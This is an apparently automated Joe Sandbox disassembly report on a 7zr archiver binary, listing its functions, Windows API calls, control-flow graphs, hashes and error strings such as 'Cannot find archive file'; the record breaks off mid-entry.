                          • API String ID: 2366012087-4000988232
                          • Opcode ID: e01a89427951463436aa4b83f83cf8a239d949778df3ee4087b95f648ab4e373
                          • Instruction ID: d41cc09580e63e3f47dbbb088411bbc98611752ab61e4b27ab15261ece1c611e
                          • Opcode Fuzzy Hash: e01a89427951463436aa4b83f83cf8a239d949778df3ee4087b95f648ab4e373
                          • Instruction Fuzzy Hash: 40815A35D00259EFCF15EFA4D995ADEBBB5AF29310F1040A9E416B7292DB30AE05CF60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1563 186c72-186c8e call 21fb10 1566 186c90-186c94 1563->1566 1567 186c96-186c9e 1563->1567 1566->1567 1568 186cd3-186cdc call 188664 1566->1568 1569 186ca0-186ca4 1567->1569 1570 186ca6-186cae 1567->1570 1576 186ce2-186d02 call 1867f0 call 182f88 call 1887df 1568->1576 1577 186d87-186d92 call 1888c6 1568->1577 1569->1568 1569->1570 1570->1568 1572 186cb0-186cb5 1570->1572 1572->1568 1574 186cb7-186cce call 1867f0 call 182f88 1572->1574 1589 18715d-18715f 1574->1589 1602 186d4a-186d61 call 187b41 1576->1602 1603 186d04-186d09 1576->1603 1584 186d98-186d9e 1577->1584 1585 186f4c-186f62 call 1887fa 1577->1585 1584->1585 1588 186da4-186dc7 call 182e47 * 2 1584->1588 1597 186f64-186f66 1585->1597 1598 186f67-186f74 call 1885e2 1585->1598 1610 186dc9-186dcf 1588->1610 1611 186dd4-186dda 1588->1611 1595 187118-187126 1589->1595 1597->1598 1612 186fd1-186fd8 1598->1612 1613 186f76-186f7c 1598->1613 1615 186d63-186d65 1602->1615 1616 186d67-186d6b 1602->1616 1603->1602 1607 186d0b-186d38 call 189252 1603->1607 1607->1602 1622 186d3a-186d45 1607->1622 1610->1611 1617 186ddc-186def call 182407 1611->1617 1618 186df1-186df9 call 183221 1611->1618 1619 186fda-186fde 1612->1619 1620 186fe4-186feb 1612->1620 1613->1612 1621 186f7e-186f8a call 186bf5 1613->1621 1623 186d7a-186d82 call 18764c 1615->1623 1624 186d78 1616->1624 1625 186d6d-186d75 1616->1625 1617->1618 1636 186dfe-186e0b call 1887df 1617->1636 1618->1636 1619->1620 1628 1870e5-1870ea call 186868 1619->1628 1629 18701d-187024 call 188782 1620->1629 1630 186fed-186ff7 call 186bf5 1620->1630 1621->1628 1639 186f90-186f93 1621->1639 1622->1589 1650 187116 1623->1650 1624->1623 1625->1624 1641 1870ef-1870f3 1628->1641 1629->1628 1647 18702a-187035 1629->1647 1630->1628 1645 186ffd-187000 1630->1645 1652 186e0d-186e10 1636->1652 1653 186e43-186e50 call 186c72 1636->1653 1639->1628 1646 186f99-186fb6 call 1867f0 call 182f88 1639->1646 1648 18710c 1641->1648 1649 1870f5-1870f7 1641->1649 1645->1628 1654 187006-18701b call 1867f0 1645->1654 1683 186fb8-186fbd 1646->1683 1684 186fc2-186fc5 call 18717b 1646->1684 1647->1628 1656 18703b-187044 call 188578 1647->1656 1658 18710e-187111 call 186848 1648->1658 1649->1648 1657 1870f9-187102 1649->1657 1650->1595 1659 186e1e-186e36 call 1867f0 1652->1659 1660 186e12-186e15 1652->1660 1678 186f3a-186f4b call 181e40 * 2 1653->1678 1679 186e56 1653->1679 1674 186fca-186fcc 1654->1674 1656->1628 1677 18704a-187054 call 18717b 1656->1677 1657->1648 1665 187104-187107 call 18717b 1657->1665 1658->1650 1681 186e58-186e7e call 182f1c call 182e04 1659->1681 1682 186e38-186e41 call 182fec 1659->1682 1660->1653 1667 186e17-186e1c 1660->1667 1665->1648 1667->1653 1667->1659 1674->1658 1693 187064-187097 call 182e47 call 181089 * 2 call 186868 1677->1693 1694 187056-18705f call 182f88 1677->1694 1678->1585 1679->1681 1701 186e83-186e99 call 186bb5 1681->1701 1682->1681 1683->1684 1684->1674 1725 187099-1870af wcscmp 1693->1725 1726 1870bf-1870cc call 186bf5 1693->1726 1703 187155-187158 call 186848 1694->1703 1709 186e9b-186e9f 1701->1709 1710 186ecf-186ed1 1701->1710 1703->1589 1712 186ea1-186eae call 1822bf 1709->1712 1713 186ec7-186ec9 SetLastError 1709->1713 1715 186f09-186f35 call 181e40 * 2 call 186848 call 181e40 * 2 1710->1715 1722 186eb0-186ec5 call 181e40 call 182e04 1712->1722 1723 186ed3-186ed9 1712->1723 1713->1710 1715->1650 1722->1701 1727 186edb-186ee0 1723->1727 1728 186eec-186f07 call 1831e5 1723->1728 1731 1870bb 1725->1731 1732 1870b1-1870b6 1725->1732 1740 187129-187133 call 1867f0 1726->1740 1741 1870ce-1870d1 1726->1741 1727->1728 1734 186ee2-186ee8 1727->1734 1728->1715 1731->1726 1738 187147-187154 call 182f88 call 181e40 1732->1738 1734->1728 1738->1703 1757 18713a 1740->1757 1758 187135-187138 1740->1758 1746 1870d8-1870e4 call 181e40 1741->1746 1747 1870d3-1870d6 1741->1747 1746->1628 1747->1740 1747->1746 1761 187141-187144 1757->1761 1758->1761 1761->1738
                          APIs
                          • __EH_prolog.LIBCMT ref: 00186C77
                          • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00186EC9
                            • Part of subcall function 00186C72: wcscmp.MSVCRT ref: 001870A5
                            • Part of subcall function 00186BF5: __EH_prolog.LIBCMT ref: 00186BFA
                            • Part of subcall function 00186BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00186C1A
                            • Part of subcall function 00186BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00186C49
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                          • String ID: :$DATA
                          • API String ID: 3316598575-2587938151
                          • Opcode ID: e7787084bcc2cd7474a69dc518049a31fd8513245e4a4af70b2d266f6044561b
                          • Instruction ID: 352b710c7585c2aa98ba2392f8b08bd22de6dbc7957d91d7953b2b75f928c8b0
                          • Opcode Fuzzy Hash: e7787084bcc2cd7474a69dc518049a31fd8513245e4a4af70b2d266f6044561b
                          • Instruction Fuzzy Hash: DAE136319006099ACF26FFA4C895BEEB7B1BF25314F20451DE8866B2D1DB70AB49CF51
                          APIs
                          • __EH_prolog.LIBCMT ref: 00196FCA
                            • Part of subcall function 00196E71: __EH_prolog.LIBCMT ref: 00196E76
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                          • API String ID: 3519838083-394804653
                          • Opcode ID: 9b86ced7a0264fb2528801feae4fca01859932b0b6efba4200313e03c1596f14
                          • Instruction ID: 630c8358b74f2115d7fca32efa4d71994b8f8eddbd86b89a0a4a8be3b95b484a
                          • Opcode Fuzzy Hash: 9b86ced7a0264fb2528801feae4fca01859932b0b6efba4200313e03c1596f14
                          • Instruction Fuzzy Hash: 8341D672D19284EBCF25DFA484919EEFBF5BF5A300F58446EE086A3281C7306E45CB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prolog
                          • String ID: =
                          • API String ID: 2614055831-2525689732
                          • Opcode ID: 9dbc51791501bebbe450a8a8a9563e137050de5b9ed039651e11b53eb163c5fa
                          • Instruction ID: a41cb7edd32e71d005a9aab813b46b94a8a578e1ecc89b391e53c2f7b04480d3
                          • Opcode Fuzzy Hash: 9dbc51791501bebbe450a8a8a9563e137050de5b9ed039651e11b53eb163c5fa
                          • Instruction Fuzzy Hash: 24218E32904118EBCF1AFB94E942AEDBBB9EF68710F20002AE40172191DF716F55CF90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CBDBA
                            • Part of subcall function 001CBE69: __EH_prolog.LIBCMT ref: 001CBE6E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: "$0"$D"
                          • API String ID: 3519838083-338471513
                          • Opcode ID: c90d782168a49c95bffdd6bfb99f1fc6a41c6f9363d72c6deca8613163ce6630
                          • Instruction ID: c178ee0926b9f6bd562014b6e318714b2e8c7fa8f22934e4d2f8e8606f6a6b09
                          • Opcode Fuzzy Hash: c90d782168a49c95bffdd6bfb99f1fc6a41c6f9363d72c6deca8613163ce6630
                          • Instruction Fuzzy Hash: 1211E6B0911B54DFC721DF99D588A86FBE4BF28304F55C86ED0AE87712C7B0A968CB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B8346
                          • fputs.MSVCRT ref: 001B835B
                          • fputs.MSVCRT ref: 001B8364
                            • Part of subcall function 001B83BF: __EH_prolog.LIBCMT ref: 001B83C4
                            • Part of subcall function 001B83BF: fputs.MSVCRT ref: 001B8401
                            • Part of subcall function 001B83BF: fputs.MSVCRT ref: 001B8437
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prolog
                          • String ID: =
                          • API String ID: 2614055831-2525689732
                          • Opcode ID: 429c1cf83c663074873fab087b99baf0b000ff89a15e30756f4e4ae1f7b37fd4
                          • Instruction ID: 456a9af49aea34a51e3a2c00f7f26df4e404be13be76379ff2b286043450fade
                          • Opcode Fuzzy Hash: 429c1cf83c663074873fab087b99baf0b000ff89a15e30756f4e4ae1f7b37fd4
                          • Instruction Fuzzy Hash: 23018632A04014BBCF16BBA4D852AEDBBB9EF94B54F00401AF505921A1CF754B56DFD1
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,0019AB57), ref: 00217DAA
                          • GetLastError.KERNEL32(?,00000000,0019AB57), ref: 00217DBB
                          • CloseHandle.KERNELBASE(00000000,?,00000000,0019AB57), ref: 00217DCF
                          • GetLastError.KERNEL32(?,00000000,0019AB57), ref: 00217DD9
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLast$CloseHandleObjectSingleWait
                          • String ID:
                          • API String ID: 1796208289-0
                          • Opcode ID: c7e700df2c840ac292cfb3b117ad34f6a76969f39ca5b3fbde22c339ec2e45d2
                          • Instruction ID: bfaa9bbaf8dcb2fa3d17a6374573207523be3372a49d5d0a7fdd937ae16ca5b8
                          • Opcode Fuzzy Hash: c7e700df2c840ac292cfb3b117ad34f6a76969f39ca5b3fbde22c339ec2e45d2
                          • Instruction Fuzzy Hash: 0FF0FE7132820B57EB305EBDBC88FB666F8AFA5374B300769E965D21D0DF60DC918660
                          APIs
                          • EnterCriticalSection.KERNEL32(00242938), ref: 001B588B
                          • LeaveCriticalSection.KERNEL32(00242938), ref: 001B58BC
                            • Part of subcall function 001BC911: GetTickCount.KERNEL32 ref: 001BC926
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$CountEnterLeaveTick
                          • String ID: v$8)$
                          • API String ID: 1056156058-815355827
                          • Opcode ID: 432a31a053d896b346c76f62c50e61f5161cfb38ecbfc1a855cb4580b0a45592
                          • Instruction ID: db96f41a3ba16420d28c22c4c213001fd48080fcf214d135285cfc23eef8054f
                          • Opcode Fuzzy Hash: 432a31a053d896b346c76f62c50e61f5161cfb38ecbfc1a855cb4580b0a45592
                          • Instruction Fuzzy Hash: FDE06575605210EFC308EF19E908E8A37A6AFE8311F01056EF40987362CB308949CAA1
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A209B
                            • Part of subcall function 0018757D: GetLastError.KERNEL32(0018D14C), ref: 0018757D
                            • Part of subcall function 001A2C6C: __EH_prolog.LIBCMT ref: 001A2C71
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ErrorLastfree
                          • String ID: Cannot find archive file$The item is a directory
                          • API String ID: 683690243-1569138187
                          • Opcode ID: 44a094d601d171ef504a3d1827a166dd160373eab644da2033d799b074c470a3
                          • Instruction ID: f6bf2da0a55747454ff0d4578e5890be0c35c63e4815cf08a7fea82dbf1813ee
                          • Opcode Fuzzy Hash: 44a094d601d171ef504a3d1827a166dd160373eab644da2033d799b074c470a3
                          • Instruction Fuzzy Hash: 49724774D00258DFCB26DFA8C984BDEBBB5BF5A304F14409AE859A7252C7709E81CF51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CountTickfputs
                          • String ID: .
                          • API String ID: 290905099-4150638102
                          • Opcode ID: febe54ee0760ae8f8829288900aec03b0467e85fbc7351473415be7a5ac7a126
                          • Instruction ID: cf6154d643476265906680089411356dc6b71326f57ebd93bb8831994791148e
                          • Opcode Fuzzy Hash: febe54ee0760ae8f8829288900aec03b0467e85fbc7351473415be7a5ac7a126
                          • Instruction Fuzzy Hash: B5714830600B049FDB26EF68C591AAEB7F6AF91704F10481DE49797A81DB70BA49CF51
                          APIs
                            • Part of subcall function 00189C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00189CB3
                            • Part of subcall function 00189C8F: GetProcAddress.KERNEL32(00000000), ref: 00189CBA
                            • Part of subcall function 00189C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00189CC8
                          • __aulldiv.LIBCMT ref: 001C093F
                          • __aulldiv.LIBCMT ref: 001C094B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                          • String ID: 3333
                          • API String ID: 3520896023-2924271548
                          • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                          • Instruction ID: f39c447217e7ba0164ffadd2e430aae1685f09a42d6d961f151743077944c802
                          • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                          • Instruction Fuzzy Hash: DF21BCB1900704AFE734DF698881B5BFAFDEB58754F14492EB14AD3241D770D9408B55
                          APIs
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          • memset.MSVCRT ref: 001AAEBA
                          • memset.MSVCRT ref: 001AAECD
                            • Part of subcall function 001C04D2: _CxxThrowException.MSVCRT(?,00234A58), ref: 001C04F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memset$ExceptionThrowfree
                          • String ID: Split
                          • API String ID: 1404239998-1882502421
                          • Opcode ID: 70efcf6434bb248cbe6d9a1f76d08a90a4d1a4bae5bc2bbe6ea21dcab3aaf7fb
                          • Instruction ID: ddc90c6146a59a427cb6540c1754afbffb239e8eab6096267d59a9a8e9fc2094
                          • Opcode Fuzzy Hash: 70efcf6434bb248cbe6d9a1f76d08a90a4d1a4bae5bc2bbe6ea21dcab3aaf7fb
                          • Instruction Fuzzy Hash: 77426C74A00248DFDF25DFA4C984BEDBBB5BF1A314F5440A9E449A7252CB31AE85CF12
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018759F
                            • Part of subcall function 0018764C: CloseHandle.KERNELBASE(00000000,?,001875AF,00000002,?,00000000,00000000), ref: 00187657
                          • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 001875E5
                          • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00187626
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CreateFile$CloseH_prologHandle
                          • String ID:
                          • API String ID: 449569272-0
                          • Opcode ID: dd4d930fb37a77e7241e59b3c3d1e87cb94a48881c8033fe256ae24f55555f3b
                          • Instruction ID: 06d6d32b19cb70aad39c1edfc8d33c73cd987aa36777fa59b7b066b8c0c39956
                          • Opcode Fuzzy Hash: dd4d930fb37a77e7241e59b3c3d1e87cb94a48881c8033fe256ae24f55555f3b
                          • Instruction Fuzzy Hash: F9117F7280420AEFCF11AFA8DC418EEBB7AFF54354B208929F960561A1D7359E61EF50
                          APIs
                          • fputs.MSVCRT ref: 001B8437
                          • fputs.MSVCRT ref: 001B8401
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                          • __EH_prolog.LIBCMT ref: 001B83C4
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologfputs$fputc
                          • String ID:
                          • API String ID: 678540050-0
                          • Opcode ID: a250cd2d6abe2eeca0eebba4f2e8e052005b9f75f87420f625722a9bd74c50c7
                          • Instruction ID: 69cf502fce45e1407181ea615920a7844b70d5209bbc96b2a6e66d33fa79d142
                          • Opcode Fuzzy Hash: a250cd2d6abe2eeca0eebba4f2e8e052005b9f75f87420f625722a9bd74c50c7
                          • Instruction Fuzzy Hash: B3118632B081156BCB0AB7A0E9136AEBB7AEF64750F100029F501926D1DF651A56CFD4
                          APIs
                          • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,001877DB,?,?,00000000,?,00187832,?), ref: 00187773
                          • GetLastError.KERNEL32(?,001877DB,?,?,00000000,?,00187832,?,?,?,?,00000000), ref: 00187780
                          • SetLastError.KERNEL32(00000000,?,?,001877DB,?,?,00000000,?,00187832,?,?,?,?,00000000), ref: 00187797
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLast$FilePointer
                          • String ID:
                          • API String ID: 1156039329-0
                          • Opcode ID: d1fdace9cfb7f1f654f3d3bb6473814bbf8a011aa5565520f411d93b8e0bb7a5
                          • Instruction ID: f501d4177ef95692dd28794be485bec6bf7ecf7dd50d06eb19b180f06d69fada
                          • Opcode Fuzzy Hash: d1fdace9cfb7f1f654f3d3bb6473814bbf8a011aa5565520f411d93b8e0bb7a5
                          • Instruction Fuzzy Hash: 8411BF71604305AFEF25AFA8DC49BAE7BE5AF44320F208429F81697291D7B0DE50DF50
                          APIs
                          • __EH_prolog.LIBCMT ref: 00185A91
                          • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00185AB7
                          • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00185AEC
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AttributesFile$H_prolog
                          • String ID:
                          • API String ID: 3790360811-0
                          • Opcode ID: 917d414b03061915a70fc2dca9042d5dc2afc8ce38115a29467f68f51eeeb2b5
                          • Instruction ID: e16e2615cb4119d63f9d00b115887d4f893c21a1e8ddeb0e501e603f252b3ce6
                          • Opcode Fuzzy Hash: 917d414b03061915a70fc2dca9042d5dc2afc8ce38115a29467f68f51eeeb2b5
                          • Instruction Fuzzy Hash: D8019232E00615ABCF19BBA4A9C16BEB77BEF64350F144426EC11A3191CB354E16DF50
                          APIs
                          • __EH_prolog.LIBCMT ref: 00195BEF
                            • Part of subcall function 001954C0: __EH_prolog.LIBCMT ref: 001954C5
                            • Part of subcall function 00195630: __EH_prolog.LIBCMT ref: 00195635
                            • Part of subcall function 001A36EA: __EH_prolog.LIBCMT ref: 001A36EF
                            • Part of subcall function 001957C1: __EH_prolog.LIBCMT ref: 001957C6
                            • Part of subcall function 001958BE: __EH_prolog.LIBCMT ref: 001958C3
                          Strings
                          • Cannot seek to begin of file, xrefs: 0019610F
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: Cannot seek to begin of file
                          • API String ID: 3519838083-2298593816
                          • Opcode ID: 36482d86404c6f28527af389d77e287806f36db2ff6b8b70d7a1b4323241917f
                          • Instruction ID: f727df0d9730dfa6b5276d325e28963343f8a11620860fa60e7fdf26e3c4836a
